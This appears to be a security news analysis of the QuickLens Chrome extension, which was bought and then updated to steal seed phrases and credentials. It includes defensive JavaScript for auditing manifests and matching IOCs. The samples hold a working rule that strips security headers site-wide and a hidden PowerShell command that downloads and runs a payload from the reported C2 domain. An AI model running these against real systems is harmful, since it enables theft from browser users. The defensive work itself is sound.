Security News

The QuickLens Chrome extension was purchased through a marketplace, weaponized within 16 days, and pushed to roughly 7,000 users via silent auto-update. The update stripped browser security headers site-wide, harvested cryptocurrency seed phrases from twelve targeted wallets, stole credentials and session data, and deployed ClickFix social engineering to trigger local code execution. The attack exploits a structural gap in enterprise browser management: extensions that already hold user trust and permissions can be re-weaponized after an ownership transfer without triggering standard supply chain controls. Affected users face irreversible exposure of seed phrases and credentials; organizations face a detection gap that passive monitoring cannot close.

The QuickLens compromise is a clean case study in the acquisition-then-weaponize pattern now documented across multiple browser extension attacks. A buyer purchased an established extension with an existing user base and a prior Google Featured badge (both trust signals) through ExtensionHub, then released a malicious update (version 5.8) 16 days after the ownership transfer on February 1, 2026. The auto-update mechanism that makes browser extensions convenient is the delivery vector here: no user action, no new installation prompt, no change in the extension's apparent identity. Chrome only disables an updated extension and asks the user to re-approve it when the update adds a permission that carries a new warning string; an extension that already holds broad host permissions can pick up webRequest and declarativeNetRequestWithHostAccess without a new warning, which is why an update like this one installs silently. Standard software supply chain controls, such as code signing reviews, vendor vetting, and initial permission audits, do not catch post-acquisition permission escalation or behavioral changes in already-installed extensions. The 16-day weaponization window is the operational constraint security teams must plan around; it is too short for passive detection cycles to surface a problem before damage occurs.

Version 5.8 introduced two permissions, declarativeNetRequestWithHostAccess and webRequest, that enabled the attack's most architecturally significant capability: stripping Content-Security-Policy, X-Frame-Options, and X-XSS-Protection headers from every page the user visited, not just targeted domains. In Manifest V3 that stripping is done with declarativeNetRequest modifyHeaders rules, which can remove response headers on any site covered by the extension's host permissions; webRequest in MV3 lets the extension observe requests and responses rather than block them (blocking webRequest is reserved for policy-installed extensions). This is not a targeted injection attack; it is a site-wide collapse of browser-enforced security boundaries. Of the three headers, X-XSS-Protection is already ignored by current Chrome, which removed its XSS Auditor in version 78, so the real damage is the loss of CSP and X-Frame-Options. With CSP removed, the extension injected inline JavaScript payloads retrieved from the C2 domain api.extensionanalyticspro[.]top via a 1×1 GIF pixel onload trick, executing on every page load. Security teams should treat this as a reminder that webRequest and declarativeNetRequestWithHostAccess are not administrative conveniences: they are capabilities that can functionally neutralize any web application security control that assumes the browser will enforce security headers.
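To make the mechanism concrete, here is an added example (not QuickLens code, and not taken from the report). It shows the shape of a Manifest V3 declarativeNetRequest rule that strips security headers from every response, a simplified simulation of what reaches the page once such a rule is applied, and a manifest audit plus version diff that flags the permission combinations behind it. The two manifests are constructed for the example; only the fact that version 5.8 added declarativeNetRequestWithHostAccess and webRequest comes from the report.

```javascript
// Added example: rule shape, simulated effect, and a manifest audit/diff.
// Node.js, no dependencies. Manifests below are constructed, not real.

// Rule shape per chrome.declarativeNetRequest. Combined with broad host
// permissions in the manifest, `urlFilter: "*"` applies it on every site.
const STRIP_SECURITY_HEADERS_RULE = {
  id: 1,
  priority: 1,
  action: {
    type: "modifyHeaders",
    responseHeaders: [
      { header: "content-security-policy", operation: "remove" },
      { header: "x-frame-options", operation: "remove" },
      { header: "x-xss-protection", operation: "remove" },
    ],
  },
  condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame"] },
};

// Simplified model of how Chrome applies modifyHeaders rules (assumption:
// real matching also honours initiator/domain conditions and priorities).
// Header names are case-insensitive, so keys are normalised to lower case.
function applyModifyHeadersRules(rules, url, responseHeaders) {
  const out = {};
  for (const [k, v] of Object.entries(responseHeaders)) out[k.toLowerCase()] = v;
  for (const rule of rules) {
    if (rule.action.type !== "modifyHeaders") continue;
    const filter = rule.condition.urlFilter;
    const matches = !filter || filter === "*" || url.includes(filter.replace(/\*/g, ""));
    if (!matches) continue;
    for (const op of rule.action.responseHeaders || []) {
      const name = op.header.toLowerCase();
      if (op.operation === "remove") delete out[name];
      else if (op.operation === "set") out[name] = op.value;
      else if (op.operation === "append") out[name] = name in out ? `${out[name]}, ${op.value}` : op.value;
    }
  }
  return out;
}

// Host patterns that cover every site. MV2 manifests list hosts under
// `permissions`, MV3 under `host_permissions`, so both are scanned.
const ALL_HOST_PATTERNS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

function auditManifest(manifest) {
  const perms = new Set(manifest.permissions || []);
  const hosts = [...(manifest.host_permissions || []), ...perms];
  const broadHosts = hosts.some((h) => ALL_HOST_PATTERNS.includes(h));
  const findings = [];
  if (broadHosts && (perms.has("declarativeNetRequestWithHostAccess") || perms.has("declarativeNetRequest")))
    findings.push("can remove or rewrite response headers (CSP, X-Frame-Options) on every site");
  if (broadHosts && perms.has("webRequest"))
    findings.push("can observe every request and response the browser makes");
  if (broadHosts && perms.has("scripting"))
    findings.push("can inject scripts into every page");
  return { name: manifest.name, version: manifest.version, broadHosts, findings };
}

// Permissions added between two versions: the re-review trigger that an
// ownership transfer followed by a quiet update otherwise slips past.
function addedPermissions(before, after) {
  const old = new Set([...(before.permissions || []), ...(before.host_permissions || [])]);
  return [...(after.permissions || []), ...(after.host_permissions || [])].filter((p) => !old.has(p));
}

// Constructed manifests: a benign baseline and an update that adds the two
// permissions the report attributes to version 5.8.
const BASELINE_MANIFEST = {
  name: "example-lens", version: "1.0.0", manifest_version: 3,
  permissions: ["storage", "activeTab"], host_permissions: ["<all_urls>"],
};
const WEAPONIZED_MANIFEST = {
  ...BASELINE_MANIFEST, version: "5.8",
  permissions: [...BASELINE_MANIFEST.permissions, "declarativeNetRequestWithHostAccess", "webRequest"],
};

function demo() {
  const headers = {
    "Content-Type": "text/html",
    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "DENY",
  };
  return {
    stripped: applyModifyHeadersRules([STRIP_SECURITY_HEADERS_RULE], "https://bank.example/", headers),
    baseline: auditManifest(BASELINE_MANIFEST),
    weaponized: auditManifest(WEAPONIZED_MANIFEST),
    added: addedPermissions(BASELINE_MANIFEST, WEAPONIZED_MANIFEST),
  };
}

if (typeof require !== "undefined" && require.main === module) console.log(JSON.stringify(demo(), null, 2));
```

Run it with `node` to see the bank page's CSP and X-Frame-Options disappear while Content-Type survives, the baseline manifest audit clean, and the "updated" manifest gain both findings. The same auditManifest and addedPermissions functions can be pointed at the manifest.json files under a managed Chrome profile's Extensions directory to turn the review described here into a scheduled check.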

The payload chain was modular and sequenced against high-value targets. A first-stage payload contacted google-update[.]icu to serve a fake Google Update prompt, which delivered a ClickFix lure prompting users to run code locally. On Windows, this downloaded googleupdate.exe, signed under the certificate entity ‘Hubei Da’e Zhidao Food Technology Co., Ltd.’ (a signer with no plausible relation to Google, and a red flag for endpoint detection), which executed a hidden PowerShell chain connecting to drivers[.]solutions/META-INF/xuoa.sys using the distinctive ‘Katzilla’ user agent string. The second-stage C2 was offline at time of analysis, leaving the full second-stage payload unconfirmed, a genuine gap in the available intelligence. A separate agent directly targeted twelve cryptocurrency wallets, eleven of which the report names: MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Solflare, Backpack, Brave Wallet, Exodus, Binance Chain Wallet, WalletConnect, and Argon. Seed phrase theft from these wallets is irreversible; there is no revocation path, and funds can only be protected by moving them to a wallet generated from a fresh seed. Additional collection targeted form credentials, payment data, Gmail inbox contents, Facebook Business Manager data, and YouTube channel information, a broad harvesting scope consistent with a financially motivated actor building resale-ready credential packages.

Two analytical gaps deserve explicit attention. First, the macOS exposure: Annex’s review suggested AMOS (Atomic Stealer) was deployed against macOS users, but BleepingComputer could not independently confirm this. Security teams in mixed Windows/macOS environments should not treat macOS as unaffected; the correct posture is unresolved exposure, not absence of risk. Second, the ClickFix layer is not specific to this campaign. Huntress documented a separate extension last month that crashed browsers to display fake fix prompts installing ModeloRAT. ClickFix now consistently appears as a second-stage delivery mechanism layered on browser extension compromises, which suggests threat actors have standardized on the combination. A browser prompt instructing users to paste clipboard contents into a terminal or Run dialog, or to execute a downloaded file, should be treated as a high-confidence attack indicator regardless of how polished the UI appears; this is the behavioral signature to train against.

Detection opportunities exist across the IOC set: C2 domain api.extensionanalyticspro[.]top, redirect domain google-update[.]icu, payload URL drivers[.]solutions/META-INF/xuoa.sys, the ‘Katzilla’ user agent string, the signing certificate entity ‘Hubei Da’e Zhidao Food Technology Co., Ltd.’, and extension ID kdenlnncndfnhkognokgfpabgkgehoddto. One check before that ID goes into a blocklist or a log search: Chrome extension IDs are exactly 32 lowercase letters from a to p, and the ID as printed here is 34 characters long and contains a ‘t’, so verify it against the original report. Endpoint telemetry queries should target PowerShell executions that chain Invoke-Expression with an outbound URI, particularly those setting a non-standard user agent. DNS and proxy logs should be reviewed retroactively for any of the three IOC domains, subdomains included, as installation activity may predate current detection coverage.
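The following is an added example, not part of the report: the published IOCs matched against constructed DNS and endpoint telemetry, the PowerShell behavioural check described above, a signer-name check for the downloaded binary, and the extension-ID sanity check. The IOC strings are the ones listed on this page; every log record, hostname and timestamp is made up for the example.

```javascript
// Added example: IOC and behavioural matching over constructed telemetry.
// Node.js, no dependencies. Log records below are invented sample data.

function refang(indicator) { return indicator.replace(/\[\.\]/g, "."); }
// Lower-case and fold curly apostrophes so the certificate subject matches
// whether it was copied from a report or read from signer metadata.
function norm(s) { return String(s).toLowerCase().replace(/[\u2018\u2019]/g, "'").trim(); }

const IOC = {
  domains: ["api.extensionanalyticspro[.]top", "google-update[.]icu", "drivers[.]solutions"].map(refang),
  userAgents: ["Katzilla"],
  certSubjects: ["Hubei Da’e Zhidao Food Technology Co., Ltd."],
  extensionIds: ["kdenlnncndfnhkognokgfpabgkgehoddto"], // exactly as printed in the report
};

// Chrome extension IDs are 32 lowercase letters a..p. The ID printed in the
// report does not fit that form, so verify it before loading it anywhere.
function isWellFormedExtensionId(id) { return /^[a-p]{32}$/.test(id); }

// A query hits if it equals an IOC domain or is a subdomain of it.
function domainHit(query, domains) {
  const q = norm(query).replace(/\.$/, "");
  return domains.find((d) => q === d || q.endsWith("." + d)) || null;
}

function matchDns(records) {
  const hits = [];
  for (const r of records) {
    const ioc = domainHit(r.query, IOC.domains);
    if (ioc) hits.push({ seq: r.seq, host: r.host, query: r.query, ioc });
  }
  return hits;
}

// Process-creation heuristic from the report: PowerShell chaining
// Invoke-Expression with an outbound URI, a hidden window, or an IOC string.
// Returns the list of reasons, or null when the event is not suspicious.
function flagPowerShell(event) {
  const image = norm(event.image);
  if (!/(^|[\\/])(powershell|pwsh)(\.exe)?$/.test(image)) return null;
  const cmd = norm(event.commandLine);
  const reasons = [];
  if (/(^|[\s(;{])(iex|invoke-expression)\b/.test(cmd)) reasons.push("invoke-expression");
  if (/https?:\/\/[^\s'"]+/.test(cmd)) reasons.push("external-uri");
  if (/-(w|windowstyle)\s+hidden/.test(cmd)) reasons.push("hidden-window");
  for (const ua of IOC.userAgents) if (cmd.includes(norm(ua))) reasons.push("ioc-user-agent:" + ua);
  for (const d of IOC.domains) if (cmd.includes(d)) reasons.push("ioc-domain:" + d);
  const iexWithUri = reasons.includes("invoke-expression") && reasons.includes("external-uri");
  return iexWithUri || reasons.some((r) => r.startsWith("ioc-")) ? reasons : null;
}

// Signed-binary check: the signer subject matches the reported certificate.
function flagSigner(event) {
  const subject = norm(event.signer || "");
  return IOC.certSubjects.find((c) => subject === norm(c)) || null;
}

// Constructed sample telemetry (not real logs).
const SAMPLE_DNS = [
  { seq: 1, host: "ws-042", query: "www.google.com" },
  { seq: 2, host: "ws-042", query: "api.extensionanalyticspro.top." },
  { seq: 3, host: "ws-042", query: "cdn.drivers.solutions" },
];
const SAMPLE_PROCESSES = [
  { image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell.exe -w hidden -c \"$c=New-Object Net.WebClient;$c.Headers['User-Agent']='Katzilla';IEX $c.DownloadString('https://drivers.solutions/META-INF/xuoa.sys')\"",
    signer: "" },
  { image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: "powershell.exe -NoProfile -Command Get-Process", signer: "" },
  { image: "C:\\Users\\u\\Downloads\\googleupdate.exe", commandLine: "googleupdate.exe",
    signer: "Hubei Da'e Zhidao Food Technology Co., Ltd." },
];

function triage() {
  return {
    dnsHits: matchDns(SAMPLE_DNS),
    powershell: SAMPLE_PROCESSES.map(flagPowerShell),
    signers: SAMPLE_PROCESSES.map(flagSigner),
    extensionIdWellFormed: IOC.extensionIds.map(isWellFormedExtensionId),
  };
}

if (typeof require !== "undefined" && require.main === module) console.log(JSON.stringify(triage(), null, 2));
```

Running it flags the two DNS queries that touch IOC domains (including the subdomain), the hidden PowerShell download chain on all five counts, the binary signed by the reported entity, and reports the printed extension ID as malformed. The behavioural rule is deliberately independent of the IOC list: Invoke-Expression plus an outbound URI is enough on its own, so the same check keeps working when the next campaign rotates its domains.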

  • Takeaway 1: Block the three IOC domains, api.extensionanalyticspro[.]top, google-update[.]icu, and drivers[.]solutions, in DNS and proxy controls now, and audit endpoint and proxy logs retroactively for the extension ID kdenlnncndfnhkognokgfpabgkgehoddto (after verifying the ID against the source report, since as printed it does not fit the 32-character a–p form of a Chrome extension ID).
  • Takeaway 2: Any Chrome extension holding declarativeNetRequestWithHostAccess (or declarativeNetRequest) together with broad host permissions can remove CSP and other browser security headers on every site, and webRequest lets it observe all traffic. Audit enterprise extension allowlists, remove or restrict extensions holding these permissions without explicit business justification, and consider the ExtensionSettings policy's blocked_permissions list to deny them to extensions that have no need for them.
  • Takeaway 3: Users who had QuickLens installed must treat all browser-stored credentials, payment data, and session tokens as compromised and rotate them immediately. Funds in any of the twelve targeted cryptocurrency wallets should be moved to a wallet created from a newly generated seed phrase, not merely a new address under the same seed, because a stolen seed phrase cannot be revoked and every address derived from it stays exposed.
  • Takeaway 4: The 16-day window from ownership transfer to malicious update is too short for passive monitoring. Enterprise browser management policies should enforce extension version pinning and require re-review triggered by ownership changes or new permission requests.
  • Takeaway 5: ClickFix is now a documented standard layer on browser extension compromises; any in-browser prompt instructing users to run clipboard code or execute a downloaded file is a high-confidence attack indicator and should be covered in user security awareness training as a named technique.
  • Takeaway 6: macOS exposure via AMOS (Atomic Stealer) was suggested by Annex but not independently confirmed. Mixed-environment security teams should treat macOS users as potentially affected and monitor accordingly rather than assuming Windows-only scope.

Author

Tech Jacks Solutions
